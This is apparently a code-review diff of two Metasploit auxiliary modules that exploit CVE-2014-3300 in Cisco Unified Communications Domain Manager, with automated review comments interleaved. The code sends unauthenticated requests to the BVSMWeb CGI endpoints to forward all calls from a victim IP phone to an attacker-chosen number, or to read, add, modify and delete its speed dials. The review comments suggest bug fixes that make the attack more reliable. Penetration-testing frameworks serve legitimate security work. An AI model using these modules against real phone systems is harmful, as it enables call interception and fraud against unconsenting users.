diff --git a/modules/auxiliary/voip/viproy_cucdm_callforward.rb b/modules/auxiliary/voip/viproy_cucdm_callforward.rb
index 3ea066c89f..27618658a2 100644
--- a/modules/auxiliary/voip/viproy_cucdm_callforward.rb
+++ b/modules/auxiliary/voip/viproy_cucdm_callforward.rb
@@ -15,28 +15,42 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super( 'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool', - 'Version' => '1', 'Description' => %q{ - CUCDM IP Phone XML Services - Call Forwarding Tool - This tool can be tested with the voss-xmlservice component of Viproy. - https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb + The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM) + in Unified CDM Application Software before 10 does not properly implement access control, + which allows remote attackers to modify user information. This vulnerability can be exploited + for unauthorised call forwarding using this module. This tool can be tested with the fake + voss-xmlservice component of Viproy. }, 'Author' => 'Fatih Ozavci ', - 'References' => + 'References' => [ - ['CVE', 'CVE-2014-3300'], + ['CVE', '2014-3300'], ['BID', '68331'], + ['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb'] ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ 'FORWARD', { + 'Description' => 'Enabling the call forwarding for the MAC address.' + } ], + [ 'INFO', { + 'Description' => 'Retrieving the call forwarding information for the MAC address.' + } ], + [ 'list', { + 'Description' => 'List the actions that would be started' + } ] + ], + 'DefaultAction' => 'INFO' + ) register_options( [ - Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']), OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']), OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']), - OptString.new('ACTION', [ true, 'Call forwarding action (FORWARD,INFO)', 'FORWARD']), OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']), ], self.class) end 
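Review bot: The `list` entry added to `'Actions'` is lowercase while `FORWARD` and `INFO` are uppercase, and nothing in the visible hunks of `run` gives it a branch: the only comparison is `action.name.upcase == "FORWARD"`. As far as these hunks show, selecting `list` would therefore behave like `INFO` and still issue the `showcallfwd.cgi` request, which contradicts its description "List the actions that would be started". Either drop the entry or add an early return for it before any request is sent. The same `list` entry is added in the `initialize` hunk of viproy_cucdm_speeddials.rb, where the `case action.name.upcase` labels for it are not visible either.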
@@ -44,21 +58,21 @@ class Metasploit3 < Msf::Auxiliary def run uri = normalize_uri(target_uri.to_s) mac = Rex::Text.uri_encode(datastore["MAC"]) - forwardto = Rex::Text.uri_encode(datastore["FORWARDTO"]) + forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"]) print_status("Getting fintnumbers and display names of the IP phone") - uri_show=uri+"/showcallfwd.cgi?device=SEP#{mac}" + uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}") vprint_status("URL: "+uri_show) res = send_request_cgi( { 'uri' => uri_show, 'method' => 'GET', - }, 20) + }) - if (res and res.code == 200 and res.body =~ /fintnumber/) + if res and res.code == 200 and res.body =~ /fintnumber/ doc = REXML::Document.new(res.body) lines=[] fintnumbers=[] 
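Review bot: At `uri_show` the query string is concatenated into the path and the whole string is then passed through `normalize_uri`, which is meant for joining path segments. Keeping path and parameters apart reads better and leaves the encoding to the HTTP client, e.g. `'uri' => normalize_uri(uri, 'showcallfwd.cgi'), 'vars_get' => { 'device' => "SEP#{mac}" }`. If that form is adopted, the manual `Rex::Text.uri_encode` on `MAC` probably has to go to avoid double encoding; worth confirming. The same pattern appears at `uri_fwd` and `uri_fwdpln` in the next hunk, and `run` continues past the end of this hunk.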
@@ -72,29 +86,31 @@ class Metasploit3 < Msf::Auxiliary } lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])} + # for a specific FINTNUMBER redirection + fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]] - if datastore["ACTION"] == "FORWARD" + if action.name.upcase == "FORWARD" fintnumbers.each {|fintnumber| print_status("Sending call forward request for #{fintnumber}") - uri_fwd=uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forwardto}" + uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}") vprint_status("URL: "+uri_fwd) res = send_request_cgi( { 'uri' => uri_fwd, 'method' => 'GET', - }, 20) + }) - uri_fwdpln=uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}" + uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}") vprint_status("URL: "+uri_fwdpln) res = send_request_cgi( { 'uri' => uri_fwdpln, 'method' => 'GET', - }, 20) + }) - if (res.body.to_s =~ /CFA/) + if res and res.body and res.body.to_s =~ /CFA/ print_good("Call forwarded successfully for #{fintnumber}") else print_status("Call forward failed.") diff --git a/modules/auxiliary/voip/viproy_cucdm_speeddials.rb b/modules/auxiliary/voip/viproy_cucdm_speeddials.rb index 9560ca37b5..b88c3296c8 100644 --- a/modules/auxiliary/voip/viproy_cucdm_speeddials.rb +++ b/modules/auxiliary/voip/viproy_cucdm_speeddials.rb 
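Review bot: The guard on the added line `fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]` is always true, because a one-element array literal is truthy in Ruby even when its element is `nil` or `''`. Since `FINTNUMBER` is optional and defaults to `''`, the list parsed from the response is always replaced, by a single empty entry when the option is unset. Test the value itself: `fintnumbers = [datastore["FINTNUMBER"]] unless datastore["FINTNUMBER"].to_s.empty?`. Unlike `MAC` and `FORWARDTO`, this value is also interpolated into the URLs without `Rex::Text.uri_encode`, and the response to the `uri_fwd` request is overwritten without being checked. The enclosing block of `run` starts and ends outside this hunk.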
@@ -13,19 +13,40 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super( 'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool', - 'Version' => '1', 'Description' => %q{ - CUCDM IP Phone XML Services - Speed Dial Attack Tool - This tool can be tested with the voss-xmlservice component of Viproy. - https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb + The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM) + in Unified CDM Application Software before 10 does not properly implement access control, + which allows remote attackers to modify user information. This vulnerability can be exploited + for unauthorised speeddial manipulation using this module. This tool can be tested with the fake + voss-xmlservice component of Viproy. }, 'Author' => 'Fatih Ozavci ', 'References' => [ - ['CVE', 'CVE-2014-3300'], + ['CVE', '2014-3300'], ['BID', '68331'], + ['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb'] ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ 'GET', { + 'Description' => 'Getting the speeddials for the MAC address.' + } ], + [ 'MODIFY', { + 'Description' => 'Modifying a speeddial for the MAC address.' + } ], + [ 'ADD', { + 'Description' => 'Adding a speeddial for the MAC address.' + } ], + [ 'DELETE', { + 'Description' => 'Deleting a speeddial for the MAC address.' + } ], + [ 'list', { + 'Description' => 'List the actions that would be started' + } ] + ], + 'DefaultAction' => 'GET' ) register_options( 
@@ -33,7 +54,6 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']), OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']), - OptString.new('ACTION', [ true, 'Speed Dials Action: LIST|MODIFY|ADD|DELETE', 'LIST']), OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']), OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']), OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']), @@ -48,19 +68,19 @@ class Metasploit3 < Msf::Auxiliary telno = Rex::Text.uri_encode(datastore["TELNO"]) - case datastore["ACTION"].upcase + case action.name.upcase when 'MODIFY' print_status("Deleting Speed Dial of the IP phone") url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/ print_good("Speed Dial #{position} is deleted successfully") print_status("Adding Speed Dial to the IP phone") url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Added/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Added/ print_good("Speed Dial #{position} is added successfully") elsif res.body =~ /exist/ print_error("Speed Dial is exist, change the position or choose modify!") 
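Review bot: In the `MODIFY` branch the context line `elsif res.body =~ /exist/` is reached exactly when the preceding `status != Exploit::CheckCode::Safe and ...` test fails, and the new `send_rcv` returns `Exploit::CheckCode::Safe,res` with `res` possibly `nil` when the target does not answer. That path raises `NoMethodError` instead of printing an error. Guard it with `elsif res && res.body =~ /exist/`, or return early when `status` is `Safe`. The `ADD` hunk further down has the same `elsif res.body =~ /exist/` after the same pattern.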
@@ -74,8 +94,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Deleting Speed Dial of the IP phone") url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/ print_good("Speed Dial #{position} is deleted successfully") else print_error("Speed Dial is not found!") @@ -84,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Adding Speed Dial to the IP phone") url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Added/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Added/ print_good("Speed Dial #{position} is added successfully") elsif res.body =~ /exist/ print_error("Speed Dial is exist, change the position or choose modify!") @@ -97,23 +117,24 @@ class Metasploit3 < Msf::Auxiliary url=uri+"/speeddials.cgi?device=SEP#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - parse(res) if res != Exploit::CheckCode::Safe + status,res=send_rcv(url) + parse(res) if status != Exploit::CheckCode::Safe end end def send_rcv(uri) + uri=normalize_uri(uri.to_s) res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', - }, 20) - if (res and res.code == 200 and res.body =~ /Speed [D|d]ial/) - return res + }) + if res and res.code == 200 and res.body =~ /Speed [D|d]ial/ + return Exploit::CheckCode::Vulnerable,res else print_error("Target appears not vulnerable!") - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe,res end end
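Review bot: In `send_rcv` the character class in `/Speed [D|d]ial/` also matches a literal `|`, since alternation has no meaning inside brackets; `/Speed [Dd]ial/` says what is intended. The `else` branch also reports "Target appears not vulnerable!" and returns `Exploit::CheckCode::Safe` when `res` is `nil`, so a timeout or connection failure is indistinguishable from a response that simply did not match. Handling `res.nil?` separately with its own message (and, if a check code is kept as the status, `Exploit::CheckCode::Unknown`) would make the result trustworthy. A short comment on the method stating that it now returns a `[status, response]` pair would help callers, and `&&` is preferred over `and` in these conditions.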